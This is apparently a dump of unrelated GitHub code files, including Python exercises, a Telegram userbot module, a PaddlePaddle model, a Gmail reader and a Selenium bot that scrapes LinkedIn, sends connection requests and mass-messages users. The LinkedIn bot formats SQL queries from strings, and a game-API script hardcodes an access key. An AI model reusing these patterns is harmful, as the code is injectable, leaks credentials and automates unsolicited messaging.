+{"seq_id":"12996778931","text":"l1=[]\nn1=int(input(\"\"))\nfor i in range(0,n1):\n a=int(input(\" \"))\n l1.append(a)\nopt=int(input(\"1.delete \\n 2.Insert\"))\nif opt==2:\n a=int(input(\" index value\"))\n b=input(\"value \")\n l1.insert(a,b)\nelse:\n op=int(input(\" 1.delete by value \\n 2. delete by index \\n 3.delete range\"))\n if(op==1):\n k=input(\"enter you want to delete\")\n l1.remove(k)\n elif op==2:\n k=int(input(\"enter index\"))\n del l1[k]\n else:\n st=int(input(\"strating index\"))\n ed=int(input(\"ending value\"))\n for i in range(st,ed+1):\n del l1[i]\n\n\nprint(l1)","repo_name":"Anubhavpandey27/Python_for_ds_assignment","sub_path":"assignment 1/answer 4.py","file_name":"answer 4.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"13753823034","text":"# █ █ █ █▄▀ ▄▀█ █▀▄▀█ █▀█ █▀█ █ █\n# █▀█ █ █ █ █▀█ █ ▀ █ █▄█ █▀▄ █▄█\n\n# 🔒 Licensed under the GNU GPLv3\n# 🌐 https://www.gnu.org/licenses/agpl-3.0.html\n# 👤 https://t.me/hikamoru\n\n# meta developer: @hikamorumods\n# meta banner: https://raw.githubusercontent.com/AmoreForever/assets/master/DTWR.jpg\n\nfrom .. import loader, utils\nfrom telethon.tl.types import Message\n\n\n@loader.tds\nclass DTWRMod(loader.Module):\n \"\"\"Module Don't tag wihout reason\"\"\"\n\n strings = {\n \"name\": \"DTWR\",\n \"text\": \"Your custom text\",\n \"username\": \"Input you username without '@'\",\n }\n\n strings_ru = {\n \"text\": \"Кастомный текст\",\n \"username\": \"Введи свой юзернэйм без '@'\",\n }\n\n strings_uz = {\n \"text\": \"Kastom text\",\n \"username\": \"Usernameingizni kiriting, '@' siz\"\n }\n\n def __init__(self):\n self.config = loader.ModuleConfig(\n loader.ConfigValue(\n \"Username\",\n \"username\",\n doc=lambda: self.strings(\"username\"),\n ),\n loader.ConfigValue(\n \"custom_text\",\n \"😫 Please don't tag me without reason\",\n doc=lambda: self.strings(\"text\"),\n ),\n )\n\n @loader.command(ru_docs=\"Конфиг этого модуля\")\n async def cfgdtwrcmd(self, message):\n \"\"\"This module config\"\"\"\n name = self.strings(\"name\")\n await self.allmodules.commands[\"config\"](\n await utils.answer(message, f\"{self.get_prefix()}config {name}\")\n )\n\n @loader.tag(\"only_messages\", \"only_groups\", \"in\")\n async def watcher(self, message: Message):\n\n reply = await message.get_reply_message()\n\n tag = self.config['Username']\n if tag.startswith('@') is False:\n tag = f\"@{tag}\"\n\n if reply:\n return False\n if message.text.lower() == tag:\n await message.reply(self.config[\"custom_text\"])\n await self._client.send_read_acknowledge(\n message.chat_id,\n clear_mentions=True,\n )\n","repo_name":"AmoreForever/amoremods","sub_path":"dtwr.py","file_name":"dtwr.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"38"}
+{"seq_id":"22652870187","text":"import paddle\nimport paddle.nn as nn\n\nfrom .layers import Conv7x7\n# from utils.download import download_and_decompress\n# from ops.tlx_basic_pooling import tlx_MaxPool2d, tlx_MaxUnPool2d\n# from utils.load_model import restore_model, load, download_and_decompress\nfrom paddle2tlx.pd2tlx.utils import load_model_cdet\nCDNET_URLS = \"https://paddlers.bj.bcebos.com/pretrained/cd/levircd/weights/cdnet_levircd.pdparams\"\n\nclass CDNet(nn.Layer):\n \"\"\"\n The CDNet implementation based on PaddlePaddle.\n\n The original article refers to\n Pablo F. Alcantarilla, et al., \"Street-View Change Detection with Deconvolut\n ional Networks\"\n (https://link.springer.com/article/10.1007/s10514-018-9734-5).\n\n Args:\n in_channels (int): Number of bands of the input images.\n num_classes (int): Number of target classes.\n \"\"\"\n\n def __init__(self, in_channels, num_classes):\n super(CDNet, self).__init__()\n self.conv1 = Conv7x7(in_channels, 64, norm=True, act=True)\n self.pool1 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv2 = Conv7x7(64, 64, norm=True, act=True)\n self.pool2 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv3 = Conv7x7(64, 64, norm=True, act=True)\n self.pool3 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv4 = Conv7x7(64, 64, norm=True, act=True)\n self.pool4 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv5 = Conv7x7(64, 64, norm=True, act=True)\n self.upool4 = nn.MaxUnPool2D(2, 2)\n self.conv6 = Conv7x7(64, 64, norm=True, act=True)\n self.upool3 = nn.MaxUnPool2D(2, 2)\n self.conv7 = Conv7x7(64, 64, norm=True, act=True)\n self.upool2 = nn.MaxUnPool2D(2, 2)\n self.conv8 = Conv7x7(64, 64, norm=True, act=True)\n self.upool1 = nn.MaxUnPool2D(2, 2)\n self.conv_out = Conv7x7(64, num_classes, norm=False, act=False)\n\n def forward(self, t1, t2):\n x = paddle.concat([t1, t2], axis=1)\n x, ind1 = self.pool1(self.conv1(x))\n x, ind2 = self.pool2(self.conv2(x))\n x, ind3 = self.pool3(self.conv3(x))\n x, ind4 = self.pool4(self.conv4(x))\n x = self.conv5(self.upool4(x, ind4))\n x = self.conv6(self.upool3(x, ind3))\n x = self.conv7(self.upool2(x, ind2))\n x = self.conv8(self.upool1(x, ind1))\n return [self.conv_out(x)]\n\n\ndef _cdnet(pretrained=None, in_channels=6, num_classes=2):\n model = CDNet(in_channels=in_channels,num_classes=num_classes)\n if pretrained:\n model = load_model_cdet(model, CDNET_URLS, \"cdnet\")\n # weight_path = download_and_decompress(CDNET_URLS)\n # param = paddle.load(weight_path)\n # # print(len([k for k in param.keys()]))\n # model.load_dict(param)\n return model\n","repo_name":"tensorlayer/Paddle2TLX","sub_path":"pd_models/paddlerscd/models/cdnet.py","file_name":"cdnet.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"}
+{"seq_id":"45996324274","text":"\r\n\r\nprint(\"*********************************\")\r\nprint(\"*****Olá, Seja bem vindo(a)!*****\")\r\nprint(\"*********************************\")\r\nprint(\"Iremos te auxiliar no cálculo no seu planejamento financeiro!\")\r\nprint('Primeiramente precisamos de alguns dados:')\r\ndef calcular():\r\n while True:\r\n capital = float(input(\"Qual seu valor inicial?\"))\r\n taxa = float(input(\"Qual a taxa de juros da sua aplicação (em %)?\"))\r\n tempo = float(input(\"Por quantos meses seu capital estará sujeito a esse juros?\"))\r\n juros = taxa / 100\r\n\r\n print('Qual cálculo você deseja realizar?')\r\n calculo = int(input('[1] Juros Simples [2] Juros Compostos'))\r\n if (calculo == 1):\r\n simples = capital * juros * tempo\r\n print(f'Esse é o seu capital total: {simples}')\r\n elif (calculo == 2):\r\n composto = capital * (1 + juros) ** tempo\r\n print(f'Esse é o seu capital total: {composto}')\r\n else:\r\n print('Opção invalida! Tente novamente!')\r\n calcular()\r\n break\r\ndef nova_consulta():\r\n repetir = int(input('Deseja realizar uma nova consulta? [1] para SIM ou [2] para NÃO?'))\r\n if repetir == 1:\r\n calcular()\r\n elif repetir == 2:\r\n print('Até a próxima!')\r\n exit()\r\n else:\r\n print('Opção inválida, tente novamente!')\r\n nova_consulta()\r\n\r\ncalcular()\r\nnova_consulta()\r\n\r\n","repo_name":"vansmelof/calculadoradejuros","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"73817130670","text":"import logging\n\nimport gmail\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"googleapiclient\").setLevel(logging.ERROR)\nlogger = logging.getLogger('AutoReply')\n\n\ndef main():\n logger.info('AutoReply script started.')\n logger.info('Reading gmail messages')\n info_form_list = gmail.Gmail().read_messages()\n output_file = open('results.txt', 'w')\n for info_form in info_form_list:\n output_file.write(str(info_form))\n output_file.write('\\n<<<-------------->>>\\n')\n output_file.close()\n logger.info('Reading Gmail messages completed. Please check results.txt')\n\nif __name__ == '__main__':\n main()\n","repo_name":"jaideep-khadilkar/InfoProvider","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70570334191","text":"import os\nimport sys\nimport time \nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nimport lxml\nimport re\nimport sqlite3\nfrom sqlite3 import Error as DB_ERROR\nimport random\n\n# Import chromedriver.exe\nplatform = sys.platform\n\nif platform == \"linux\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"webdriver/linux/chromedriver.exe\")\n sys.path.append(\"/home/jarret/.local/lib/python3.6/site-packages/\")\nelif platform == \"win32\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), r\"webdriver\\windows\\chromedriver.exe\")\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException, WebDriverException\n\nclass LinkedIn_Bot:\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.current_page_source = None\n\n def __str__(self):\n return \"LinkedIn_Bot - Created By Jarret Laberdee - Class Object Created To Increase Reach Of Development Web On LinkedIn\"\n\n def create_browser(self):\n \"\"\"Creates a browser instance of webdriver.\"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--ignore-ssl-errors\")\n self.browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)\n\n def get_page_source(self):\n page = BeautifulSoup(self.browser.page_source, features='lxml')\n return page \n\n def close_browser(self):\n self.browser.close()\n\n def navigate_to_url(self, url, sleep_interval):\n self.browser.get(url)\n time.sleep(sleep_interval)\n\n def login(self):\n self.browser.find_element_by_id(\"login-email\").send_keys(self.username)\n self.browser.find_element_by_id(\"login-password\").send_keys(self.password)\n self.browser.find_element_by_id(\"login-submit\").click()\n time.sleep(2)\n\n def navigate_to_network(self):\n self.browser.find_element_by_id(\"mynetwork-tab-icon\").click()\n time.sleep(2)\n\n def compile_people_links(self, page):\n links = []\n for link in page.find_all('a'):\n url = link.get('href')\n if url:\n if '/in/' in url:\n if url not in links:\n links.append(url)\n return links\n\n def scroll_to_bottom(self, num_scrolls):\n \"\"\"Scrolls to the bottom of the page by executing Javascript\"\"\"\n\n SCROLL_PAUSE_TIME = 1.25\n scroll_height_cmd = \"window.scrollTo(0, document.body.scrollHeight);\"\n \n for page in range(num_scrolls):\n last_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n self.browser.execute_script(scroll_height_cmd)\n # self.browser.execute_script(\"alert('Scrolling')\")\n time.sleep(SCROLL_PAUSE_TIME)\n new_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n return\n last_height = new_height\n\n def store_people(self, url_list):\n people_list = []\n root_url = \"https://www.linkedin.com\"\n for person_object in url_list:\n split_person_object = person_object.replace(\"/\", \" \").replace(\"-\", \" \")\n split_person_object = split_person_object.split()\n person_url = root_url + person_object\n\n if split_person_object:\n if len(split_person_object) ==5:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = split_person_object[3]\n ID = split_person_object[4]\n if len(split_person_object) == 4:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n 
certification = \"None\"\n ID = split_person_object[3]\n elif len(split_person_object) == 3:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = \"None\"\n ID = str(split_person_object[1]) + str(split_person_object[2])\n elif len(split_person_object) == 2:\n first_name = split_person_object[1]\n last_name = \"None\"\n certification = \"None\"\n\n person = {\n 'ID' : ID,\n 'first_name' : first_name,\n 'last_name' : last_name,\n 'certification' : certification, \n 'added' : False, \n 'URL' : person_url, \n 'position_desc' : 'None',\n 'job_potential' : False,\n 'messaged' : False\n }\n\n people_list.append(person)\n\n return people_list\n\n def open_database(self):\n ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n DB_PATH = os.path.join(ROOT_DIR, 'LinkedIn_People.db')\n\n try:\n db_connection = sqlite3.connect(DB_PATH)\n return db_connection\n except DB_ERROR as e:\n print(e)\n return None\n return None\n\n def database_write(self, people_list):\n db_connection = self.open_database()\n\n try:\n self.create_table(db_connection)\n db_connection.commit()\n self.append_people(people_list, db_connection)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n finally:\n db_connection.close()\n\n def create_table(self, db_connection):\n\n create_table = \"\"\" CREATE TABLE IF NOT EXISTS people (\n ID text PRIMARY KEY UNIQUE,\n first_name text NOT NULL,\n last_name text NOT NULL, \n certification text, \n added boolean, \n URL text NOT NULL, \n position_desc text,\n job_potential boolean,\n messaged boolean\n ) \"\"\"\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(create_table)\n except DB_ERROR as e:\n print(e)\n\n def append_people(self, people_list, db_connection):\n \n try:\n db_cursor = db_connection.cursor()\n\n for person in people_list:\n columns = ', '.join(person.keys())\n values = \"'{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}'\".format(str(person[\"ID\"]), str(person[\"first_name\"]), str(person[\"last_name\"]), str(person[\"certification\"]), person[\"added\"], person[\"URL\"], person[\"position_desc\"], person[\"job_potential\"], person[\"messaged\"])\n # values = ''\n command = 'INSERT INTO people ({}) VALUES({})'.format(columns, values)\n\n try:\n db_cursor.execute(command)\n except DB_ERROR as e:\n print(e)\n except DB_ERROR as e:\n print(e)\n\n def query_db(self, db_connection, select_condition):\n\n target_list = []\n\n statement = \"\"\"\n SELECT * FROM people WHERE {}\n \"\"\".format(select_condition)\n\n try: \n db_cursor = db_connection.cursor()\n db_cursor.execute(statement)\n\n entries = db_cursor.fetchall()\n\n for entry in entries:\n target_list.append(entry)\n\n return target_list\n \n except DB_ERROR as e:\n print(e)\n return\n\n except Exception as e:\n print(e)\n return \n\n def find_not_added(self, db_connection):\n \n try:\n not_added = self.query_db(db_connection, select_condition=\"added='False' AND messaged <> 'True'\" )\n return not_added\n except DB_ERROR as e:\n print(e)\n return \n\n def format_stored_people(self, people_not_yet_added):\n\n people = []\n\n random.shuffle(people_not_yet_added)\n\n for person in people_not_yet_added:\n person_url = person[5]\n person_id = person[0]\n\n person = {\n \"ID\" : person_id,\n \"URL\" : person_url\n }\n\n people.append(person)\n\n return people\n\n def add_friends(self, urls_and_ids, db_connection, num_profiles, add_mode):\n \n profiles_visited = 0\n\n while profiles_visited < num_profiles:\n for url_and_id in 
urls_and_ids:\n url = url_and_id[\"URL\"]\n ID = url_and_id[\"ID\"]\n self.navigate_to_url(url, random.uniform(3.5, 5.9))\n job_description = self.acquire_job_description()\n first_name, last_name = self.acquire_full_name()\n if add_mode:\n self.connect_to_person()\n self.update_person(url, db_connection, job_description)\n else:\n self.update_database(db_connection, \"SET position_desc = '{}', first_name = '{}', last_name = '{}'\".format(job_description, first_name, last_name), \"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {}'s job description updated to: {}\".format(first_name, last_name, ID, job_description))\n profiles_visited += 1\n\n def update_person(self, candidate_url, db_connection, job_description):\n\n split_url = candidate_url.replace(\"/\", \" \").replace(\"-\", \" \").split()\n \n if len(split_url) == 7:\n ID = split_url[5]\n elif len(split_url) == 6:\n ID = split_url[5]\n elif len(split_url) == 5:\n ID = str(split_url[3]) + str(split_url[4])\n elif len(split_url) == 4:\n ID = split_url[3]\n\n # Returns a DB entry of one person that hasn't been added yet\n # And hasn't been messaged yet\n person_not_connected = self.query_db(db_connection, select_condition=\"WHERE ID = '{}' AND added <> 'True' AND messaged <> 'True'\".format(ID))\n \n if person_not_connected:\n # Mark person as not connected in the DB\n self.update_database(db_connection, sql_set_command=\"SET added = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n\n else:\n # No entries were returned from the DB which means that \n # 1) Entry doesn't exist\n # 2) Entry has been added already\n # 3) Entry has been messaged already\n print(\"Person with the ID {} has already been added\".format(ID))\n\n def connect_to_person(self):\n\n try:\n # Click the connect button\n connect_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n connect_button.click()\n # Wait for browser to load\n time.sleep(2)\n # Click the 'Send now' button\n send_now_button = self.browser.find_element_by_xpath(\"//button[text()='Send now']\")\n send_now_button.click()\n print(\"Person added\")\n return True \n except NoSuchElementException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False \n except WebDriverException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False\n except Exception as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... 
Database to be updated.\")\n return False\n\n def acquire_job_description(self):\n current_page = self.get_page_source()\n job_description_with_tags = current_page.find(\"h2\")\n job_description = job_description_with_tags.text\n job_description = str(job_description)\n job_description = job_description.replace(\"\\n\", \"\")\n formatted_js = re.sub(\"\\s\\s+\", \"\", job_description)\n return formatted_js\n\n def acquire_full_name(self):\n\n try:\n current_page = self.get_page_source()\n full_name_with_tags = current_page.find(\"h1\", {\"class\" : \"pv-top-card-section__name\"})\n full_name = full_name_with_tags.text\n full_name = str(full_name)\n full_name = full_name.replace(\"\\n\", \"\")\n full_name = re.sub(\"\\s\\s+\", \"\", full_name)\n split_name = full_name.split(\" \")\n if len(split_name) == 1:\n first_name = split_name[0]\n last_name = 'None'\n if len(split_name) == 2:\n first_name = split_name[0]\n last_name = split_name[1]\n elif len(split_name) > 2:\n first_name = split_name[0]\n last_name = split_name[len(split_name) - 1]\n\n except AttributeError as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n except Exception as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n\n return first_name, last_name\n\n\n def find_updated_job_descriptions(self, db_connection):\n\n matches = []\n\n # Find people who have a job description that haven't been messaged yet\n sql_job_description_command = \"position_desc <> 'None' AND messaged <> 'True'\"\n\n # Execute search in DB\n people_with_job_descriptions = self.query_db(db_connection, select_condition=sql_job_description_command)\n\n for person in people_with_job_descriptions:\n\n # Grab the 6th index of the resultant people from the db\n job_description = person[6]\n\n # Compare the resultant people against the text file for job keywords\n # and compare against the list of elimination keywords\n each_match = self.compare_desc_against_criteria(job_description, person)\n\n if each_match:\n matches.append(each_match)\n\n return matches\n\n\n def compare_desc_against_criteria(self, job_description, person):\n\n SEARCH_CRITERIA_TXT = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'txt/search_criteria.txt')\n \n matches = []\n\n ignore_criteria = [\n \"FCA\", \n \"FCA Fiat Chrysler Automobiles\",\n \"Jeep\",\n \"Operations\", \n \"DHL\", \n \"Chrysler\", \n \"Fiat\", \n \"Mopar\", \n \"Supply Chain\", \n \"WCM\", \n \"Logistics\", \n \"MLM\", \n \"Quality\",\n \"Retail\", \n \"Student\", \n \"Clerical\", \n \"Intern\", \n \"Sales\"\n ]\n \n # Open the text file where I have the keywords defined\n match_criteria = open(SEARCH_CRITERIA_TXT, 'r')\n\n job_description = str(job_description)\n \n for match_description in match_criteria:\n\n # Format the text file so we can iterate properly\n match_description = match_description.strip()\n match_description = match_description.replace(\" \", \"\")\n match_description = str(match_description)\n\n if match_description:\n\n # Read in the list of keywords that we want to ignore\n for ignore_description in ignore_criteria:\n\n # Format them so we can work with them\n ignore_description = ignore_description.replace(\" \", \"\")\n ignore_description = str(ignore_description)\n\n # If the target keyword is in their job description\n if match_description in job_description:\n\n # If the name triggers the list of words we want to avoid\n if ignore_description in job_description:\n\n # throw it out\n return \n\n else:\n\n # If we haven't already added it, add 
it\n                    if person not in matches:\n\n                        if person:\n                            matches.append(person)\n\n        match_criteria.close()\n        return matches\n\n    def get_matching_candidates(self, db_connection):\n\n        candidates = []\n\n        sql_search_command = \"WHERE job_potential = 'True' AND messaged = 'False'\"\n\n        matching_candidates = self.query_db(db_connection, select_condition=sql_search_command)\n\n        for candidate in matching_candidates:\n            if candidate:\n                candidates.append(candidate)\n\n        return candidates\n\n\n    def message_candidates(self, candidates):\n\n        for candidate in candidates:\n            ID = candidate[0]\n            first_name = candidate[1]\n            last_name = candidate[2]\n            candidate_url = candidate[5]\n\n            if candidate_url:\n                self.navigate_to_url(candidate_url, 2)\n                page = self.get_page_source()\n\n                span_text = page.find(\"span\", {\"class\": \"pv-s-profile-actions__label\"}).text\n                if span_text == 'Message':\n                    self.send_message(ID, first_name, last_name)\n                elif span_text == 'Pending':\n                    print(\"Connection Request is pending for {} {} with the ID {}. Proceeding to the next candidate\".format(first_name, last_name, ID))\n                else:\n                    print(\"Another issue arose, proceeding to the next candidate\")\n\n    def message_with_subject(self, first_name):\n\n        first_name = first_name.title()\n\n        subject = \"Hi {}\".format(first_name)\n\n        message = \"\"\"My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n        your profile stuck out to me. \n        While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n        If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping to\n        hear from you {}! Have a nice day!\"\"\".format(first_name)\n\n        message = message.replace(\"\\n\", \" \")\n        message = re.sub(\"\\s\\s+\", \" \", message)\n\n        return subject, message\n\n    def message_no_subject(self, first_name):\n\n        first_name = first_name.title()\n\n        message = \"\"\"Hi {}. My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n        your profile stuck out to me. \n        While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n        If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping to\n            hear from you {}! 
Have a nice day!\"\"\".format(first_name, first_name)\n\n message = message.replace(\"\\n\", \" \")\n message = re.sub(\"\\s\\s+\", \" \", message)\n\n return message\n\n\n def send_message(self, ID, first_name, last_name):\n\n db_connection = self.open_database()\n\n premium_url = \"https://www.linkedin.com/premium/products\"\n\n send_message_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n send_message_button.click()\n\n time.sleep(2)\n\n current_url = self.browser.current_url\n\n if premium_url in current_url:\n print(\"Messaging {} {} with the ID {} has been forwarded to premium account URL, skipping to next candidate...\".format(first_name, last_name, ID))\n return \n else:\n \n time.sleep(1)\n\n # If there's no issue with the subject form, return a tuple from the format message function\n subject, message = self.message_with_subject(first_name)\n \n # Begin message with a subject line\n\n try:\n # Type the subject to the candidate\n message_form_subject = self.browser.find_element_by_class_name(\"msg-form__subject\")\n message_form_subject.send_keys(subject)\n\n except NoSuchElementException as e:\n\n # Begin message with no subject line\n\n print(e + \"\\nExecuting message with no subject function...\\n\")\n \n # If there's an issue with the subject form ie it's not there, returns a single string from the errored format\n message = self.message_no_subject(first_name)\n\n try:\n # Type the message to the candidate\n message_form_message = self.browser.find_element_by_class_name(\"msg-form__contenteditable\")\n message_form_message.send_keys(message)\n print(\"Sending message to {} {} with the ID {}.\".format(first_name, last_name, ID))\n \n except NoSuchElementException as e:\n print(e + \"\\n\")\n pass\n \n except WebDriverException as e:\n print(e + \"\\n\")\n pass\n \n except Exception as e:\n print(e + \"\\n\")\n pass\n\n try:\n \n # Click the submit button\n message_form_submit_button = self.browser.find_element_by_class_name(\"msg-form__send-button\")\n message_form_submit_button.click()\n \n except NoSuchElementException as e:\n print(e)\n pass\n \n except WebDriverException as e:\n print(e)\n pass\n \n except Exception as e:\n print(e + \"\\n\")\n\n except WebDriverException as e:\n print(e + \"\\n\")\n return \n \n except Exception as e:\n print(e + \"\\n\")\n return \n\n try:\n # Type the message to the candidate\n message_form_message = self.browser.find_element_by_class_name(\"msg-form__contenteditable\")\n message_form_message.send_keys(message)\n print(\"Sending message to {} {} with the ID {}.\".format(first_name, last_name, ID))\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n # Click the submit button\n message_form_submit_button = self.browser.find_element_by_class_name(\"msg-form__send-button\")\n message_form_submit_button.click()\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n self.update_database(db_connection, sql_set_command=\"SET messaged = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {} has been set to 'Messaged' in the database.\".format(first_name, last_name, ID))\n except Exception as e:\n print(e)\n\n db_connection.close()\n\n def update_database(self, db_connection, sql_set_command, sql_where_command):\n\n update_command = \"\"\"\n UPDATE people\n {} \n {}\n 
\"\"\".format(sql_set_command, sql_where_command)\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(update_command)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n return\n except Exception as e:\n print(e)\n return\n\n\n \n\n\n\n\n\n\n \n \n \n\n\n \n\n\n\n\n\n \n\n\n\n","repo_name":"CarnsJalone/LinkedIn_Bot","sub_path":"py_files/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":24298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"19229958256","text":"from aiogram.types import ChatMemberUpdated\nfrom sqlalchemy.orm import selectinload\n\nfrom bot.models import Group, User\nfrom bot.repositories.uow import UnitOfWork\n\n\nasync def invite_member(event: ChatMemberUpdated, uow: UnitOfWork):\n group = await uow.groups.get_by_id(event.chat.id, [selectinload(Group.users)])\n if group is None:\n group = Group(\n id=event.chat.id,\n title=event.chat.title\n )\n await uow.groups.create(group)\n\n user = await uow.groups.get_by_id(event.new_chat_member.user.id, [selectinload(User.groups)])\n if user is None:\n user = User(\n id=event.new_chat_member.user.id,\n username=f\"@{event.new_chat_member.user.username}\"\n if event.new_chat_member.user.username\n else event.new_chat_member.user.full_name\n )\n await uow.groups.create(user)\n\n group.users.append(user)\n","repo_name":"fictadvisor/fice-sc-bot","sub_path":"bot/routes/group/invite_member.py","file_name":"invite_member.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"39191267187","text":"\"\"\"\n제출 번호: 47362584\n아이디: adviate\n문제: 2204\n결과: 맞았습니다!!\n메모리: 30840 KB \n시간: 68 ms\n언어: Python 3\n코드 길이: 253 B\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nwhile(True):\n N = int(input())\n if N == 0:\n break\n\n dic = {}\n for i in range(N):\n s = input().rstrip()\n dic[s.lower()] = s\n\n tmp = sorted(list(dic.keys()))\n print(dic[tmp[0]])\n","repo_name":"kryowen/BaekJoon_Solution","sub_path":"PY/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"39012890662","text":"##game/status\nimport requests\nimport json\n\n### Key ###\napi = 'b5d5bd555a1501b7324a020b229f7acdbf52afdea9bc2d5f96a74cf6d2e94780'\n### playername ####\nname = 'pia'\n### uid ###\nid = '111113'\n\nstat = requests.get('http://20.196.214.79:5050/game/status?key={api}&playername={name}')\nprint(\"statusRequest:\", stat.content)\nprint(\"status :\", stat.status_code)\n\nview = requests.get(f'http://20.196.214.79:5050/game/view?key={api}&uid={id}')\nprint(\"viewRequest:\", view.content)\nprint(\"status :\", view.status_code)","repo_name":"Jaejuna/Tank_simulator","sub_path":"agents/status_view.py","file_name":"status_view.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72461207790","text":"def normalize(name):\n return list(map(fn, name))\n\ndef fn(s):\n return s[0].upper() + s[1:].lower()\n\n# 测试:\nL1 = ['adam', 'LISA', 'barT']\nL2 = normalize(L1)\nprint(L2)\n\n\n\nfrom functools import reduce\ndef prod(L):\n return reduce(lambda x,y:x*y, L)\n\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\nif prod([3, 5, 7, 9]) == 945:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\ndef str2float(s):\n x1 = s[:s.find('.')]\n y1 = s[s.find('.')+1:]\n print(x1,y1)\n x2 = reduce(lambda x,y:x*10+y, map(int,x1))\n y2 = reduce(lambda x,y:x*10+y, map(int,y1)) / (10**len(y1))\n print(x2, y2, x2+y2)\n return x2+y2\n\ndef str2float2(s):\n ss = s.split('.')\n print(ss,list(map(int,ss)))\n return reduce(lambda x,y:x+y/(10**len(ss[1])), map(int,ss)) \n\nresult = str2float2('123.456')\nprint('str2float(\\'123.456\\') =', result)\nif abs(result - 123.456) < 0.00001:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\n# 素数/质数\ndef _odd_iter():\n n = 1\n while True:\n n += 2\n yield n\n\ndef _not_divisible(n):\n return lambda x: x % n > 0\n\ndef primes():\n yield 2\n it = _odd_iter()\n while True:\n n = next(it)\n yield n\n it = filter(_not_divisible(n), it)\n\nfor n in primes():\n if n < 100:\n print(n)\n else:\n break\n\n\n# 回数 \ndef is_palindrome(n):\n return str(n) == str(n)[::-1]\n\n# 测试:\noutput = filter(is_palindrome, range(1, 200))\nprint('1~200:', list(output))\nif list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\nL = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\ndef by_name(t):\n return t[0].lower()\n \nL2 = sorted(L, 